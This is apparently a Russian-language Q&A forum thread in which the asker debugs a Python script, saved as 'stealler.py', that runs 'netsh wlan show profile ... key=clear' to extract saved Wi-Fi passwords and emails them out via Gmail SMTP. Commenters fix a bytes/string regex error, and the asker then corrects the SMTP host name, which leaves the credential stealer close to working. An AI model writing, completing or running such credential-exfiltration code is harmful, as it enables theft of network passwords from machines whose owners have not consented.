# TypeError: cannot use a string pattern on a bytes-like object

Tags: python, python-3.x, wifi, re

Пишу программу, которая присылает мне на почту пароли от моих wifi сетей, но возникла ошибка:

```
File *путь к файлу*, line 48, in <module>
network_names_list = re.findall("(?:Рrofile\s*:\s)(.*)", networks)
File *путь к файлу*, line 239, in findall
return _compile(pattern, flags).findall(string)
TypeError: cannot use a string pattern on a bytes-like object
```

Вот код:

```
import subprocess
import smtplib
import re

def send_mail(email, password, message):
    server = smtplib.SMTP("smtplib.gmail.com", 587)
    server.starttls()
    server.login(email, password)
    server.sendmail(email, email, message)
    server.quit()

command = "netsh wlan show profile"
networks = subprocess.check_output(command, shell=True)
network_names_list = re.findall("(?:Profile\s*:\s)(.*)", networks)

result = " "
for network_name in network_names_list:
    command = "netsh wlan show profile " + network_name + "key=clear"
    current_result = subprocess.check.output(command, shell=True)
    result = result + current_result

send_mail("my_email", "my_password", result)
```

Comment: Вам надо декодировать `networks`, попробуйте добавить `networks = networks.decode('ISO-8859-1') `

Comment: В регулярке тип шаблона и тип текста должен быть одинаковый. Если парсите байтовую строку, то и шаблон должен быть в байтах. У вас шаблон был в виде строки, а в `networks` были байты, поэтому приведите `networks` к строке

Comment: Да, спасибо, это решило мою проблему, но теперь появилась новая - он не знает, что такое переменная send

Comment: Переменная где? Приведите код ошибки

Comment: сначала мне говорили, что нет имени переменной 'send', вы попросили скинуть перевод этой ошибки, я запустил программу снова, но вышла новая:

Comment: Traceback (most recent call last):
  File "stealler.py", line 23, in <module>
    send_mail("my_mail", "my_password", result)
  File "stealler.py", line 6, in send_mail
    server = smtplib.SMTP("smtplib.gmail.com", 587)

Comment: File "C:\Users\Админ\AppData\Local\Programs\Python\Python38-32\lib\smtplib.py"
, line 253, in __init__
    (code, msg) = self.connect(host, port)
  File "C:\Users\Админ\AppData\Local\Programs\Python\Python38-32\lib\smtplib.py"
, line 339, in connect
    self.sock = self._get_socket(host, port, self.timeout)

Comment: File "C:\Users\Админ\AppData\Local\Programs\Python\Python38-32\lib\smtplib.py"
, line 308, in _get_socket
    return socket.create_connection((host, port), timeout,
  File "C:\Users\Админ\AppData\Local\Programs\Python\Python38-32\lib\socket.py",
 line 787, in create_connection
    for res in getaddrinfo(host, port, 0, SOCK_STREAM):
  File "C:\Users\Админ\AppData\Local\Programs\Python\Python38-32\lib\socket.py",
 line 918, in getaddrinfo
    for res in _socket.getaddrinfo(host, port, family, type, proto, flags):
socket.gaierror: [Errno 11004] getaddrinfo failed

Answer (score 0):

Всем спасибо за внимание, я понял в чём проблема

```
 server = smtplib.SMTP("smtplib.gmail.com", 587)
```

надо вот так:

```
 server = smtplib.SMTP("smtp.gmail.com", 587)
```